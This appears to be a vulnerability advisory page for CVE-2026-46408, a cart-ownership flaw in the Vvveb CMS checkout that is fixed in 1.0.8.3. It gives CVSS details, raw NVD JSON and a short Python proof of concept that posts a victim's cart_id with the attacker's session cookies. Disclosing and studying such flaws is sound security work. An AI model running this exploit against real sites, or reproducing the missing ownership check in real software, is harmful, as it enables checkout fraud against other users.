Security Vulnerability Report
中文
CVE-2026-46408 CVSS 7.6 HIGH

CVE-2026-46408

Published: 2026-05-15 19:17:04
Last Modified: 2026-05-15 20:16:50

Description

Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.3, the checkout endpoint accepts a user-controlled cart_id and uses it to enter the payment flow without verifying cart ownership. A logged-in attacker can therefore reuse another user's cart data in their own checkout session. This vulnerability is fixed in 1.0.8.3.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Vvveb < 1.0.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-46408 # Description: IDOR in checkout endpoint allows reusing other users' cart_id import requests target_url = "http://target-vvveb-site.com/index.php?module=cart&action=checkout" # Attacker's session cookie after login attacker_cookies = { "PHPSESSID": "attacker_session_id_here", "vvveb_user_session": "attacker_token_here" } # Victim's cart ID (guessed or leaked) victim_cart_id = "12345" # Payload data payload = { "cart_id": victim_cart_id, "payment_method": "cod" } try: # Send request to checkout with victim's cart_id response = requests.post(target_url, data=payload, cookies=attacker_cookies) if response.status_code == 200 and "checkout" in response.text: print("[+] Exploit successful: Checkout initiated with victim's cart.") print("[+] Response snippet:", response.text[:200]) else: print("[-] Exploit failed or cart not found.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-46408", "sourceIdentifier": "[email protected]", "published": "2026-05-15T19:17:04.460", "lastModified": "2026-05-15T20:16:49.503", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.3, the checkout endpoint accepts a user-controlled cart_id and uses it to enter the payment flow without verifying cart ownership. A logged-in attacker can therefore reuse another user's cart data in their own checkout session. This vulnerability is fixed in 1.0.8.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/givanz/Vvveb/security/advisories/GHSA-rmh2-wv73-xpqh", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/security/advisories/GHSA-rmh2-wv73-xpqh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}